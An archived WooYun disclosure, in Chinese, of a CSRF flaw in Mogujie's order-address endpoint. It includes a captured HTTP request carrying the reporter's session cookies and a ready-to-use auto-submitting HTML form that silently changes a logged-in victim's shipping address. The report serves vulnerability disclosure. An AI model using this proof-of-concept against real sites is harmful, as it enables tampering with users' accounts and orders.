乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-17: 细节已通知厂商并且等待厂商处理中 2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开
海购是刚出的吧。。
http://www.mogujie.com/trade/generateorder/account#那个收货地址可以csrf看下抓包:
POST /trade/address/addfororder HTTP/1.1Host: www.mogujie.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.mogujie.com/trade/generateorder/accountContent-Length: 129Cookie: __mgjuuid=6a9f438c-07de-94d4-89cc-8da820a18675; __utma=1.929626222.1376459895.1379250882.1379322905.9; __utmz=1.1379051230.6.2.utmcsr=gouwu.hao123.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=1.|1=fromReferer=openapi.qzone.qq.com=1^2=fromSite=zn20130905qztry=1; __ud_=11ox9v6; __mogujie=D5nWI6qu62OGg3QhuZxp%2BsCZ9mNbzly38Q4aRkl%2FcEka4atLYFABD6lc4y7YnbnzrFy1JFpsTSaVWOzHr38MXw%3D%3D; from_site=openapi.qzone.qq.com%5Ezn20130905qztry; Hm_lvt_44eae355b7e89129b1dc8d5c3328450d=1378351595,1379051604; __areaid=5; bdshare_firstime=1378351777827; __pk_=HYmfHKmQg0Up8%2FQ7R6kbtJSdwYFR8pZUV%2B8DMzLC64lb8g; __mogujiettcc=1; __utmb=1.32.10.1379322905; __utmc=1Connection: keep-alivePragma: no-cacheCache-Control: no-cacheaddressId=&orderId=&province=110000&city=110100&area=110101&postcode=123456&street=1&name=1&mobile=13005264094&addressen=&nameen=
修改下就可以了,我们新建个1.html写:
<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><body><form name="csrf" action="http://www.mogujie.com/trade/address/addfororder" method="POST"><input type=text name=addressId value=""></input><input type=text name=orderId value=""></input><input type=text name=province value="110000"></input><input type=text name=city value="110100"></input><input type=text name=area value="110101"></input><input type=text name=postcode value="123456"></input><input type=text name=street value="hacksb"></input><input type=text name=name value="hacksb"></input><input type=text name=mobile value="13800138000"></input><input type=text name=addressen value=""></input><input type=text name=nameen value=""></input></form><script> document.csrf.submit();</script></body></html>
在主站那个收货地址被和谐了,哪里构造好访问什么都没,我就想起来了,购物中心,他们不是出了个海购? yes 我们开始把。
润哥你懂得。。。 再来一发礼物- -
危害等级:无影响厂商忽略
忽略时间:2013-09-22 17:52
暂无